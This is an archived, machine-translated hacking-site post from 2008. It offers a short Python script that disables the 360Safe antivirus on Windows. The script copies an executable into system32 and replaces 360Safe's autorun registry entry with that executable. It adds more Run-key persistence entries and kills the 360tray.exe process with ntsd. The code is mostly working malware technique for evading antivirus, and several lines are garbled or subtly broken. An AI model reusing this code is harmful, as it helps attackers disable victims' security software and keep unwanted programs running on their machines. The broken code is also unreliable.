Use python to modify the registry to get rid of 360safe-vulnerability warning-the black bar safety net

2008-05-03T00:00:00
ID MYHACK58:62200818950
Type myhack58
Reporter 佚名
Modified 2008-05-03T00:00:00

Description

Article author: Wu Jie Information source: evil octal information security team www.eviloctal.com)

import _winreg import os import shutil

Copy itself

shutil. copyfile('K3.exe','c:\WINDOWS\system32\K3.exe')

3 6 0 start to its own

run = _winreg. OpenKey( _winreg. HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg. KEY_WRITE )

_winreg. SetValueEx( run,"360Safetray",0,_winreg. REG_SZ, r"C:\WINDOWS\system32\k3.exe" )

Add from the start

self = _winreg. OpenKey( _winreg. HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg. KEY_WRITE )

_winreg. SetValueEx( run,"k3",0,_winreg. REG_SZ, r"C:\WINDOWS\system32\k3.exe" )

Add all users to start

allrun = _winreg. OpenKey( _winreg. HKEY_LOCAL_MACHINE, "Microsoft\Windows\CurrentVersion\policies\Explorer\Run",0,_winreg. KEY_WRITE ) _winreg. SetValueEx( allrun,"k3",0,_winreg. REG_SZ, r"C:\WINDOWS\system32\k3.exe" )

Termination of 3 6 0 process

os. popen("ntsd-c q-pn 360tray.exe cmd")